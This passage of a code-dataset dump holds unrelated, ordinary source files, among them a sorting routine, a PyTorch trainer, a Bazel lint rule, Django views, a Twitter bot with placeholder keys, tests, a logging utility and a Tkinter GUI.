思路就是打扑克时,一边抓牌一边理牌的做法,\n# 从第二个元素开始,查看是否比前面元素小,是的话,将前面大的元素依次往后挪,自己插入该空位\n# 需要一个辅助空间\n# 平均移动和比较次数为 n方/4,比冒泡和选择要再好一丢丢\n\"\"\"\n\n\ndef InsertSort(nums):\n # 从第二个元素开始\n for i in range(1, len(nums)):\n tmp = nums[i]\n j = i - 1\n while j >= 0 and tmp < nums[j]:\n # 大的元素依次往后挪\n nums[j+1] = nums[j]\n # 别完了 往前移动 j 指针\n j -= 1\n nums[j+1] = tmp\n return nums\n\n\n# 测试数据\ndef start():\n nums = [x*10 for x in range(1,11)]\n random.shuffle(nums)\n print(nums)\n\n print(\"===========排序后=================\")\n nums = InsertSort(nums)\n print(nums)\n\nif __name__ == '__main__':\n start()","sub_path":"Sort/InsertSort.py","file_name":"InsertSort.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"606355372","text":"# coding=utf-8\n# created by Ge Zhang, Jan 20, 2020\n#\n# CORAL trainer\n\n\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Adam, SGD\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\nfrom coral.model import BERT, CORAL\n\n\nimport tqdm\nimport pdb\ntorch.manual_seed(0)\n\n\ndef my_loss(reconstructed_pos, origin_pos, origin_neg):\n duplicate = int(origin_neg.shape[0] / reconstructed_pos.shape[0])\n\n hid_size = origin_neg.shape[-1]\n\n pos_sim = torch.bmm(reconstructed_pos.unsqueeze(\n 1), origin_pos.unsqueeze(2)).repeat(1, duplicate, 1).view(-1)\n neg_sim = torch.bmm(reconstructed_pos.repeat(\n 1, duplicate).view(-1, hid_size).unsqueeze(1), origin_neg.unsqueeze(2)).view(-1)\n diff = neg_sim - pos_sim + 1\n\n diff = torch.max(diff, torch.zeros_like(diff))\n loss = torch.sum(diff)\n return loss\n\n\nclass CORALTrainer:\n \"\"\"\n CORALTrainer\n \"\"\"\n\n def __init__(self, bert: BERT,\n train_dataloader: DataLoader, test_dataloader: DataLoader,\n lr: float = 1e-4,\n with_cuda: bool = True, cuda_devices=None, log_freq: int = 10, loss_lambda=1, model_path=None, n_topics=50, hinge_loss_start_point=20, entropy_start_point=30):\n \"\"\"\n :param bert: code 
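`my_loss` in the CORAL trainer above is a margin-ranking (hinge) objective over batched dot-product similarities: sum(max(0, s_neg - s_pos + 1)). A shape-checked miniature:

```python
import torch

a, p, n = torch.randn(4, 8), torch.randn(4, 8), torch.randn(4, 8)
s_pos = torch.bmm(a.unsqueeze(1), p.unsqueeze(2)).view(-1)  # row-wise dots, shape (4,)
s_neg = torch.bmm(a.unsqueeze(1), n.unsqueeze(2)).view(-1)
loss = torch.clamp(s_neg - s_pos + 1, min=0).sum()          # margin of 1
print(torch.allclose(s_pos, (a * p).sum(dim=1)), loss.item())
```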
representation encoder\n :param train_dataloader: train dataset data loader\n :param test_dataloader: test dataset data loader [can be None]\n :param lr: learning rate of optimizer\n :param with_cuda: traning with cuda\n :param log_freq: logging frequency of the batch iteration\n \"\"\"\n\n # Setup cuda device for CORAL training, argument -c, --cuda should be true\n self.loss_lambda = loss_lambda\n self.n_topics = n_topics\n\n self.hinge_loss_start_point = hinge_loss_start_point\n self.entropy_start_point = entropy_start_point\n cuda_condition = torch.cuda.is_available() and with_cuda\n\n self.device = torch.device(\"cuda:0\" if cuda_condition else \"cpu\")\n\n self.bert = bert\n self.model = CORAL(bert, n_topics=n_topics).to(self.device)\n\n print(model_path)\n if model_path:\n state_dict = torch.load(model_path)[\"model_state_dict\"]\n\n model_dict = self.model.state_dict()\n model_dict.update(state_dict)\n self.model.load_state_dict(state_dict)\n\n # Setting the train and test data loader\n self.train_data = train_dataloader\n self.test_data = test_dataloader\n\n # Setting the SGD optimizer with hyper-param\n self.optim = SGD(self.model.parameters(), lr=lr, momentum=0.9)\n\n # Using Cross Entropy Loss function for weak supervision\n self.best_loss = None\n self.updated = False\n self.log_freq = log_freq\n self.cross_entropy = nn.CrossEntropyLoss(ignore_index=0)\n\n print(\"Total Parameters:\", sum([p.nelement()\n for p in self.model.parameters()]))\n\n def train(self, epoch):\n self.model.train()\n return self.iteration(epoch, self.train_data)\n\n def test(self, epoch):\n self.model.eval()\n with torch.no_grad():\n loss = self.iteration(epoch, self.test_data, train=False)\n return loss\n\n def api(self, data_loader=None):\n self.model.eval()\n\n if not data_loader:\n data_loader = self.test_data\n\n # Setting the tqdm progress bar\n data_iter = tqdm.tqdm(enumerate(data_loader),\n total=len(data_loader),\n bar_format=\"{l_bar}{r_bar}\")\n\n stages = []\n stage_vecs = []\n with torch.no_grad():\n for i, item in data_iter:\n data = item[0]\n ndata = item[1]\n data = {key: value.to(self.device)\n for key, value in data.items()}\n ndata = {key: value.to(self.device)\n for key, value in ndata.items()}\n\n data = {key: value.to(self.device)\n for key, value in data.items()}\n ndata = {key: value.to(self.device)\n for key, value in ndata.items()}\n\n reconstructed_vec, graph_vec, origin_neg, topic_dist, stage_vec = self.model.forward(\n data[\"bert_input\"], ndata[\"bert_input\"], data[\"segment_label\"], ndata[\"segment_label\"], data[\"adj_mat\"], ndata[\"adj_mat\"])\n\n stages += torch.max(stage_vec, 1)[-1].tolist()\n stage_vecs += stage_vec.tolist()\n\n return stages, stage_vecs\n\n def iteration(self, epoch, data_loader, train=True):\n \"\"\"\n loop over the data_loader for training or testing\n if on train status, backward operation is activated\n and also auto save the model every peoch\n\n :param epoch: current epoch index\n :param data_loader: torch.utils.data.DataLoader for iteration\n :param train: boolean value of is train or test\n :return: average loss\n \"\"\"\n str_code = \"train\" if train else \"test\"\n\n # Setting the tqdm progress bar\n data_iter = tqdm.tqdm(enumerate(data_loader),\n desc=\"EP_%s:%d\" % (str_code, epoch),\n total=len(data_loader),\n bar_format=\"{l_bar}{r_bar}\")\n\n avg_loss = 0.0\n\n for i, item in data_iter:\n\n data = item[0]\n ndata = item[1]\n\n data = {key: value.to(self.device) for key, value in data.items()}\n ndata = {key: value.to(self.device)\n 
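One subtlety in the checkpoint restore above: it merges the saved weights into `model_dict` but then loads the raw `state_dict`, so the merge is unused. The usual partial-restore pattern, as a toy sketch:

```python
import torch.nn as nn

model = nn.Linear(4, 2)
checkpoint_state = {'weight': model.state_dict()['weight'] * 0}  # toy partial checkpoint
model_dict = model.state_dict()
model_dict.update(checkpoint_state)   # overlay only the saved tensors
model.load_state_dict(model_dict)     # load the merged dict, not the raw checkpoint
```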
for key, value in ndata.items()}\n\n reconstructed_vec, graph_vec, origin_neg, topic_dist, stage_vec = self.model.forward(\n data[\"bert_input\"], ndata[\"bert_input\"], data[\"segment_label\"], ndata[\"segment_label\"], data[\"adj_mat\"], ndata[\"adj_mat\"])\n\n bs, _ = reconstructed_vec.shape\n nbs, _ = origin_neg.shape\n duplicate = int(nbs / bs)\n\n hinge_loss = my_loss(reconstructed_vec, graph_vec, origin_neg)\n weight_loss = torch.norm(torch.mm(\n self.model.reconstruction.weight.T, self.model.reconstruction.weight) - torch.eye(self.n_topics).cuda())\n c_entropy = self.cross_entropy(stage_vec, data['stage'])\n entropy = -1 * (F.softmax(stage_vec, dim=1) *\n F.log_softmax(stage_vec, dim=1)).sum()\n\n if epoch < self.hinge_loss_start_point:\n loss = c_entropy\n\n elif epoch < self.entropy_start_point:\n loss = c_entropy + self.loss_lambda * weight_loss + hinge_loss\n else:\n loss = c_entropy + entropy + self.loss_lambda * weight_loss + hinge_loss\n\n if epoch == self.hinge_loss_start_point:\n self.optim = SGD(self.model.parameters(),\n lr=0.00001, momentum=0.9)\n\n if train:\n self.optim.zero_grad()\n loss.backward()\n\n self.optim.step()\n\n avg_loss += loss.item()\n\n post_fix = {\n \"epoch\": epoch,\n \"iter\": i,\n \"avg_loss\": avg_loss / (i + 1),\n \"loss\": loss.item(),\n \"cross_entropy\": c_entropy.item(),\n \"entropy\": entropy.item(),\n \"hinge_loss\": hinge_loss.item()\n }\n\n if i % self.log_freq == 0:\n data_iter.write(str(post_fix))\n\n print(\"EP%d_%s, avg_loss=\" %\n (epoch, str_code), avg_loss / len(data_iter))\n return avg_loss / len(data_iter)\n\n def save(self, epoch, file_path=\"output/bert_trained.model\"):\n \"\"\"\n Saving the current BERT model on file_path\n\n :param epoch: current epoch number\n :param file_path: model output path which gonna be file_path+\"ep%d\" % epoch\n :return: final_output_path\n \"\"\"\n output_path = file_path + \".ep%d\" % epoch\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': self.model.state_dict()\n }, output_path)\n print(\"EP:%d Model Saved on:\" % epoch, output_path)\n\n return output_path\n","sub_path":"src/models/CORAL-LM/coral/trainer/coral_trainer.py","file_name":"coral_trainer.py","file_ext":"py","file_size_in_byte":8249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"564825195","text":"load(\"@bazel_skylib//lib:shell.bzl\", \"shell\")\nload(\"@bazel_skylib//lib:paths.bzl\", \"paths\")\nload(\"@io_bazel_rules_go//go:def.bzl\", \"GoSDK\")\n\ndef _gometalinter_impl(ctx):\n args = []\n if ctx.attr.config:\n args.append(\"--config=\" + ctx.file.config.short_path)\n else:\n args.append(\"--no-config\")\n args.extend(ctx.attr.paths)\n out_file = ctx.actions.declare_file(ctx.label.name + \".bash\")\n sdk = ctx.attr._go_sdk[GoSDK]\n substitutions = {\n \"@@GOMETALINTER_SHORT_PATH@@\": shell.quote(ctx.executable._gometalinter.short_path),\n \"@@ARGS@@\": shell.array_literal(args),\n \"@@PREFIX_DIR_PATH@@\": shell.quote(paths.dirname(ctx.attr.prefix)),\n \"@@PREFIX_BASE_NAME@@\": shell.quote(paths.basename(ctx.attr.prefix)),\n \"@@NEW_GOROOT@@\": shell.quote(sdk.root_file.dirname),\n }\n ctx.actions.expand_template(\n template = ctx.file._runner,\n output = out_file,\n substitutions = substitutions,\n is_executable = True,\n )\n transitive_depsets = [\n depset(sdk.srcs),\n depset(sdk.tools),\n ]\n default_runfiles = ctx.attr._gometalinter[DefaultInfo].default_runfiles\n if default_runfiles != None:\n transitive_depsets.append(default_runfiles.files)\n\n runfiles = 
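The two regularizers combined in `iteration` above, shown in isolation: an orthogonality penalty ||W^T W - I|| on the reconstruction weights and the entropy of the stage distribution. A self-contained check:

```python
import torch
import torch.nn.functional as F

W = torch.randn(64, 50)
ortho = torch.norm(W.T @ W - torch.eye(50))   # pulls columns toward orthonormality
logits = torch.randn(8, 5)
entropy = -(F.softmax(logits, dim=1) * F.log_softmax(logits, dim=1)).sum()
print(ortho.item(), entropy.item())
```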
ctx.runfiles(\n transitive_files = depset(transitive = transitive_depsets),\n )\n return [DefaultInfo(\n files = depset([out_file]),\n runfiles = runfiles,\n executable = out_file,\n )]\n\n_gometalinter = rule(\n implementation = _gometalinter_impl,\n attrs = {\n \"config\": attr.label(\n allow_single_file = True,\n doc = \"Configuration file to use\",\n ),\n \"paths\": attr.string_list(\n doc = \"Directories to lint. /... will recurse\",\n default = [\"./...\"],\n ),\n \"prefix\": attr.string(\n mandatory = True,\n doc = \"Go import path of this project i.e. where in GOPATH you would put it. E.g. github.com/atlassian/bazel-tools\",\n ),\n \"_gometalinter\": attr.label(\n default = \"@com_github_atlassian_bazel_tools_gometalinter//:linter\",\n cfg = \"host\",\n executable = True,\n ),\n \"_runner\": attr.label(\n default = \"@com_github_atlassian_bazel_tools//gometalinter:runner.bash.template\",\n allow_single_file = True,\n ),\n \"_go_sdk\": attr.label(\n providers = [GoSDK],\n default = \"@go_sdk//:go_sdk\",\n ),\n },\n executable = True,\n)\n\ndef gometalinter(**kwargs):\n tags = kwargs.get(\"tags\", [])\n if \"manual\" not in tags:\n tags.append(\"manual\")\n kwargs[\"tags\"] = tags\n _gometalinter(\n **kwargs\n )\n","sub_path":"gometalinter/def.bzl","file_name":"def.bzl","file_ext":"bzl","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"294850231","text":"from django.shortcuts import render\n\n# Create your views here.\n\nfrom .models import my_ch\n\ndef numbers(request, num):\n ans = []\n for i in my_ch.objects.all():\n # compare the numeric field, not the model instance itself;\n # the early break assumes the queryset is ordered by numb\n if i.numb <= num:\n ans.append(i.numb)\n else:\n break\n return render(request,'prost/index.html',{'ans': ans})\n","sub_path":"mysite/prost/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"287071332","text":"from django.shortcuts import render, get_list_or_404, get_object_or_404, redirect\nfrom rb.models import Receita\n\ndef busca(request):\n \n busca_receitas = Receita.objects.order_by('-date_receita').filter(publicada=True)\n \n if 'buscar' in request.GET:\n nome_a_buscar = request.GET['buscar']\n busca_receitas = busca_receitas.filter(nome_receita__icontains=nome_a_buscar)\n \n dados = {\n 'receitas' : busca_receitas\n }\n \n return render(request, 'receitas/buscar.html', dados)\n","sub_path":"apps/rb/views/busca.py","file_name":"busca.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"609373372","text":"#!/usr/bin/python\n\n\"\"\"\nShared memory segments\n\"\"\"\n\nimport sys\nimport lib_common\nfrom lib_properties import pc\nfrom sources_types import CIM_Process\n\ndef Main():\n\tcgiEnv = lib_common.CgiEnv()\n\tpid = int( cgiEnv.GetId() )\n\n\tgrph = cgiEnv.GetGraph()\n\n\tproc_obj = CIM_Process.PsutilGetProcObj(pid)\n\n\tnodeProcess = lib_common.gUriGen.PidUri(pid)\n\n\ttry:\n\t\tall_maps = CIM_Process.PsutilProcMemmaps(proc_obj)\n\texcept:\n\t\texc = sys.exc_info()[1]\n\t\tlib_common.ErrorMessageHtml(\"get_memory_maps Pid=%d. 
Caught %s\\n\" % (pid,str(exc)) )\n\n\tpropMemoryRSS = lib_common.MakeProp(\"Resident Set Size\")\n\tfor map in all_maps:\n\t\t# Replace backslashes because all Windows paths are \"standardized\" by us.\n\t\tcleanMapPath = map.path.replace(\"\\\\\",\"/\")\n\n\t\turiMemMap = lib_common.gUriGen.MemMapUri( cleanMapPath )\n\n\t\tgrph.add( ( uriMemMap, propMemoryRSS, lib_common.NodeLiteral(map.rss) ) )\n\t\tgrph.add( ( nodeProcess, pc.property_memmap, uriMemMap ) )\n\n\tcgiEnv.OutCgiRdf( \"LAYOUT_SPLINE\")\n\nif __name__ == '__main__':\n\tMain()\n\n","sub_path":"survol/sources_types/CIM_Process/process_memmaps.py","file_name":"process_memmaps.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"458921400","text":"#! /usr/bin/env python\n\nimport datetime\nimport sys\nimport time\nimport tweepy\n\n# connect to api\nconsumer_key = \"xxx\"\nconsumer_secret = \"xxx\"\naccess_key = \"xxx\"\naccess_secret = \"xxx\"\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret, callback = None)\nauth.set_access_token(access_key, access_secret)\napi = tweepy.API(auth)\n\n# pull id of latest dm\nf = open(\"latest_dm_id.txt\", \"r+\")\nlatest_dm_id = int(f.read())\nf.close()\n\n# change this from an infinite loop to a cron job\nwhile True:\n\n # create empty list to insert tweets\n dms_to_tweet = []\n\n # create buffer variable\n buffer = 60\n\n # pull data of most recent ansiblebot tweet\n most_recent_tweet = api.home_timeline(count=1)[0]\n\n # alert user api was called\n print(\"Called api.home_timeline().\")\n\n # append each tweet object on the first page of dms to dms_to_tweet\n for dm in (api.direct_messages(since_id=most_recent_tweet.id, page=1)[::-1]):\n dms_to_tweet.append(dm)\n\n # alert user api was called again\n print(\"Called api.direct_messages().\")\n\n # open tweet log file to store information\n tweet_log = open(\"tweet_log.txt\", \"a\")\n\n # also open list of users to store information\n user_lst = open(\"user_lst.txt\", \"r+\")\n\n # main tweet loop -- run the following code on each of the dms to tweet\n for dm in dms_to_tweet:\n\n        # tweet the text of the current dm object\n api.update_status(dm.text)\n\n # learn how to decode from byte (emoji) to string\n tweet = dm.text\n\n        # attempt to store tweet information into variable for logging\n try:\n log = \"@\" + dm.sender_screen_name + \":\\n\" + \"\\\"\" + tweet + \\\n \"\\\"\\n\" + \"at \" + str(datetime.datetime.now()) + \"\\n\\n\"\n tweet_log.write(log)\n except UnicodeEncodeError:\n            # alert user bot could not decode tweet\n print(\"Could not log tweet without decoding to UTF-8.\")\n            # if cannot decode, notify in tweet log\n tweet_log.write(\"@\" + dm.sender_screen_name + \" tweeted using emojis. 
Could not decode.\\n\\n\")\n\n        # alert user bot has tweeted\n print(\"\\nTweeted \\\"\" + tweet + \"\\\" from \" + dm.sender_screen_name + \\\n \" at \" + str(datetime.datetime.now()) + \".\\n\")\n\n        # if new tweeter, log to user_lst.txt\n if (\"@\" + dm.sender_screen_name + \"\\n\") not in user_lst.readlines():\n user_lst.write(\"@\" + dm.sender_screen_name + \"\\n\")\n print(\"Appended @\" + dm.sender_screen_name + \" to user_lst.txt.\")\n        # otherwise, don't, and alert user\n else:\n print(\"@\" + dm.sender_screen_name + \" is already in user_lst.txt.\")\n\n        # adjust buffer\n if buffer > 0:\n buffer -= 5\n\n        # wait 5 seconds\n time.sleep(5)\n\n # close opened files\n tweet_log.close()\n user_lst.close()\n\n # log latest tweet id for next use\n f = open(\"latest_dm_id.txt\", \"r+\")\n f.seek(0)\n f.write(str(most_recent_tweet.id))\n f.close()\n\n # alert user tweets have been successful and wait\n print(\"Success. Gathering messages for the next \" + str(buffer) + \" seconds....\")\n time.sleep(buffer)\n","sub_path":"ansiblebot.py","file_name":"ansiblebot.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"548240197","text":"from aiogram import Dispatcher\nfrom aiogram.types import ContentType, Message\n\n\nasync def edited_message_warning(message: Message):\n \"\"\"\n Handler for edited messages.\n For now the reaction to an edit from either side is the same: notify the sender\n that the edited message cannot be updated on the receiving side.\n\n :param message: the message edited by a user or by an admin\n \"\"\"\n await message.reply(\"Unfortunately, the receiving side will not see this message edit. \"\n \"I recommend simply sending a new message.\")\n\n\ndef register_common_handlers(dp: Dispatcher):\n dp.register_edited_message_handler(edited_message_warning, content_types=ContentType.ANY)\n","sub_path":"bot/handlers/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"328609654","text":"\"\"\"empty message\n\nRevision ID: 36e7b0be9a01\nRevises: 8d476971c377\nCreate Date: 2018-11-11 21:03:50.903279\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '36e7b0be9a01'\ndown_revision = '8d476971c377'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('SKU', sa.Column('storage_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'SKU', 'storage', ['storage_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_constraint(None, 'SKU', type_='foreignkey')\n op.drop_column('SKU', 'storage_id')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/36e7b0be9a01_.py","file_name":"36e7b0be9a01_.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"40079265","text":"import responses\n\nfrom tests.util import random_str\nfrom tests.util import mock_http_response\nfrom binance.spot import Spot as Client\n\nmock_item = {\"key_1\": \"value_1\", \"key_2\": \"value_2\"}\n\nkey = random_str()\nsecret = random_str()\n\n\n@mock_http_response(\n responses.GET, \"/sapi/v1/sub-account/status\\\\?email=alice@test.com\", mock_item, 200\n)\ndef test_sub_account_asset():\n \"\"\"Tests the API endpoint to get sub account asset\"\"\"\n\n client = Client(key, secret)\n response = client.sub_account_status(email=\"alice@test.com\")\n response.should.equal(mock_item)\n","sub_path":"tests/spot/corporate/test_sub_account_status.py","file_name":"test_sub_account_status.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"266492088","text":"\"\"\"Tests of the phasing code for calculating UVWs.\"\"\"\nimport pytest\n\nimport numpy as np\nfrom astropy import units as un\nfrom astropy.coordinates import EarthLocation, SkyCoord\nfrom astropy.time import Time\nfrom pyuvdata import utils as uvutils\n\nfrom py21cmsense._utils import phase_past_zenith\n\n\n@pytest.mark.parametrize(\"lat\", [-1.0, -0.5, 0, 0.5, 1.0])\n@pytest.mark.parametrize(\"use_apparent\", [True, False])\ndef test_phase_at_zenith(lat, use_apparent):\n bls_enu = np.array(\n [\n [1, 0, 0],\n [0, 1, 0],\n ]\n )\n\n uvws = phase_past_zenith(\n time_past_zenith=0.0 * un.day,\n bls_enu=bls_enu,\n latitude=lat * un.rad,\n use_apparent=use_apparent,\n )\n\n assert np.allclose(np.squeeze(uvws), bls_enu, atol=5e-3)\n\n\n@pytest.mark.parametrize(\"use_apparent\", [True, False])\ndef test_phase_past_zenith(use_apparent):\n bls_enu = np.array(\n [\n [1, 0, 0],\n [0, 1, 0],\n ]\n )\n\n # Almost rotated to the horizon.\n uvws = np.squeeze(\n phase_past_zenith(\n time_past_zenith=0.2 * un.day,\n bls_enu=bls_enu,\n latitude=0 * un.rad,\n use_apparent=use_apparent,\n )\n )\n\n assert uvws[0][0] < 0.35 # Much foreshortened\n assert np.isclose(uvws[1][1], 1) # N-S direction doesn't get foreshortened.\n\n\ndef test_phase_past_zenith_shape():\n bls_enu = np.array(\n [\n [1, 0, 0],\n [0, 1, 0],\n [1, 0, 0],\n [0, 10, 0],\n [10, 0, 0],\n ]\n )\n\n times = np.array([0, 0.1, 0, 0.1]) * un.day\n\n # Almost rotated to the horizon.\n uvws = phase_past_zenith(\n time_past_zenith=times, bls_enu=bls_enu, latitude=0 * un.rad\n )\n\n assert uvws.shape == (5, 4, 3)\n assert np.allclose(uvws[0], uvws[2]) # Same baselines\n assert np.allclose(uvws[:, 0], uvws[:, 2]) # Same times\n assert np.allclose(uvws[:, 1], uvws[:, 3]) # Same times\n\n\n@pytest.mark.parametrize(\"lat\", [-1.0, -0.5, 0, 0.5, 1.0])\ndef test_use_apparent(lat):\n bls_enu = np.array(\n [\n [1, 0, 0],\n [0, 1, 0],\n ]\n )\n\n times = np.linspace(-1, 1, 3) * un.hour\n\n # Almost rotated to the horizon.\n uvws = phase_past_zenith(\n time_past_zenith=times, bls_enu=bls_enu, latitude=lat * un.rad\n )\n uvws0 = phase_past_zenith(\n time_past_zenith=times,\n bls_enu=bls_enu,\n latitude=lat * un.rad,\n use_apparent=True,\n )\n\n np.testing.assert_allclose(uvws, uvws0, atol=1e-2)\n\n\n@pytest.mark.parametrize(\"lat\", [-1.0, 
-0.5, 0, 0.5, 1.0])\n@pytest.mark.parametrize(\"time_past_zenith\", [-1 * un.hour, 0 * un.hour, 1 * un.hour])\ndef test_calc_app_coords(lat, time_past_zenith):\n # Generate ra/dec of zenith at time in the phase_frame coordinate system\n # to use for phasing\n telescope_location = EarthLocation.from_geodetic(lon=0, lat=lat * un.rad)\n\n # JD is arbitrary\n jd = 2454600\n\n zenith_coord = SkyCoord(\n alt=90 * un.deg,\n az=0 * un.deg,\n obstime=Time(jd, format=\"jd\"),\n frame=\"altaz\",\n location=telescope_location,\n )\n zenith_coord = zenith_coord.transform_to(\"icrs\")\n\n obstime = zenith_coord.obstime + time_past_zenith\n\n ra = zenith_coord.ra.to_value(\"rad\")\n dec = zenith_coord.dec.to_value(\"rad\")\n app_ra, app_dec = uvutils.calc_app_coords(\n ra, dec, time_array=obstime.utc.jd, telescope_loc=telescope_location\n )\n\n assert np.isclose(app_ra, ra, atol=0.02) # give it 1 degree wiggle room.\n assert np.isclose(app_dec, dec, atol=0.02)\n","sub_path":"tests/test_uvw.py","file_name":"test_uvw.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"265279829","text":"\"\"\"Typical usage: at the top of your file:\n\nLOGGER = Log.logger(__name__)\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\nimport logging.config\nimport sys\nimport traceback\n\nDEBUG = False\nSTACK_TRACES = False\n\nLOG_LEVEL = 'INFO'\n\nDEFAULT_FORMAT = '%(message)s'\nDEBUG_FORMAT = '%(message)s'\n# DEBUG_FORMAT = '%(levelname)s: %(message)s'\nFILE_FORMAT = '%(asctime)s %(levelname)s: %(name)s: %(message)s'\n\n_LOG_SIGNATURE = 'util/Log.py'\n_ERROR_COUNTER = {}\n\ndef _check_error_count(limit, every):\n errors = 0\n for line in traceback.format_stack():\n if _LOG_SIGNATURE not in line:\n errors = _ERROR_COUNTER.get(line, 0)\n if limit is not None and errors >= limit * (every or 1):\n return False\n _ERROR_COUNTER[line] = errors + 1\n return not (every and (errors % every))\n\n\nclass ConfigSetter(object):\n def config_update(self, get):\n self.debug = DEBUG or (get and get('debug'))\n self.stack_traces = STACK_TRACES or self.debug or (\n get and get('diagnostics', 'stack_traces'))\n self.log_level = (get and get('logging','level').upper()) or LOG_LEVEL\n\n self.kwds = {u'level': getattr(logging, self.log_level)}\n self.filename = get and get('logging', 'file')\n if self.filename:\n self.kwds[u'filename'] = self.filename\n else:\n self.kwds[u'stream'] = sys.stdout\n\n self.kwds[u'format'] = (get and get('logging', 'format')) or (\n FILE_FORMAT if self.filename else\n DEBUG_FORMAT if self.debug\n else DEFAULT_FORMAT)\n\n logging.basicConfig(**self.kwds)\n\n\nCONFIG = ConfigSetter()\ntry:\n from echomesh.base import Config\n Config.add_client(CONFIG)\nexcept:\n CONFIG.config_update(None)\n\n\ndef logger(name=None):\n assert name\n log = logging.getLogger(name or 'echomesh')\n original_error_logger = log.error\n\n def new_error_logger(*args, **kwds):\n limit = kwds.pop('limit', None)\n every = kwds.pop('every', None)\n raw = kwds.pop('raw', None)\n\n if limit is not None or every is not None:\n if not _check_error_count(limit, every):\n return\n\n message, args = (args[0] if args else ''), args[1:]\n exc_type, exc_value = sys.exc_info()[:2]\n if exc_type and not raw:\n message = '%s %s' % (exc_value, message)\n kwds['exc_info'] = kwds.get('exc_info', CONFIG.stack_traces)\n if not CONFIG.filename:\n message = 'ERROR: %s\\n' % message\n original_error_logger(message, *args, 
**kwds)\n\n log.error = new_error_logger\n return log\n\nLOGGER = logger(__name__)\nLOGGER.debug('Log level is %s', CONFIG.log_level)\n\n","sub_path":"code/python/echomesh/util/Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"378091741","text":"from tkinter import *\nfrom tkinter import ttk, filedialog, messagebox\n# Tk, Label, Button, filedialog, messagebox, Canvas\n# import matplotlib as mp\nfrom os import listdir\nfrom PIL import ImageTk, Image\n\n\nclass GUI:\n def __init__(self, master):\n\n # Variables\n self.imageNameMsg = StringVar()\n self.entryFolderName = StringVar()\n self.entryResultName = StringVar()\n self.totalImgNumber = 0\n self.curImgNumber = 0\n self.imageList = []\n self.imageFolderDir = ''\n self.cancerResultList = []\n\n self.img = None\n self.img_label = None\n self.defaultImgDir = r\"C:/Users/IceFox/AI_core/Project/GUI/TestGUI01/40X/\"\n self.ImgDir = \"\"\n\n # GUI\n self.master = master\n self.master.resizable(width=FALSE, height=FALSE)\n self.master.title(\"Cancer Classifier\")\n\n # Frame\n self.frame = ttk.Frame(self.master, padding=(5, 5, 12, 0))\n self.frame.pack(fill=BOTH, expand=1)\n\n for row in range(9):\n self.frame.grid_rowconfigure(row, minsize=15)\n for column in range(6):\n self.frame.grid_columnconfigure(column, minsize=15)\n self.frame.grid_columnconfigure(0, minsize=200)\n\n # Title (maybe not needed?)\n self.labelTitle = Label(self.frame, text=\"Cancer Classifier v1.0\")\n self.labelTitle.grid(row=0, column=3, sticky=E)\n\n # dir entry & load\n self.labelFolder = Label(self.frame, text=\"Image Folder Dir:\")\n self.labelFolder.grid(row=1, column=0, sticky=E)\n self.entryFolder = Entry(self.frame, textvariable=self.entryFolderName)\n self.entryFolder.grid(row=1, column=1, columnspan=4, sticky=W + E)\n self.btnFolder = Button(self.frame, text=\"Load\", command=self.LoadFromDir)\n self.btnFolder.grid(row=1, column=5, sticky=W)\n self.btnFolder = Button(self.frame, text=\"DebugLoad\", command=self.LoadDir)\n self.btnFolder.grid(row=1, column=6, sticky=W)\n\n self.labelResult = Label(self.frame, text=\"Classification Result Dir:\")\n self.labelResult.grid(row=2, column=0, sticky=E)\n self.entryResultDir = Entry(self.frame, textvariable=self.entryResultName)\n self.entryResultDir.grid(row=2, column=1, columnspan=4, sticky=W + E)\n self.btnFolder = Button(self.frame, text=\"Save\", command=self.LoadDir)\n self.btnFolder.grid(row=2, column=5, sticky=W)\n\n # main panel for labeling\n self.labelFolder = Label(self.frame, text=\"Image in the folder:\")\n self.labelFolder.grid(row=3, column=0, sticky=S)\n lists = StringVar(value=self.imageList)\n self.imageListbox = Listbox(self.frame, listvariable=lists, height=5)\n self.imageListbox.grid(row=4, column=0, rowspan=5, sticky=(N, S, E, W))\n self.imageNameLabel = Label(self.frame, textvariable=self.imageNameMsg)\n self.imageNameLabel.grid(row=4, column=3, columnspan=3, sticky=W)\n\n # self.imageListbox.bind('<>', self.DisplaySelectedImageName)\n self.imageListbox.bind('', self.ListboxSelected)\n\n # canvas\n self.canvas = 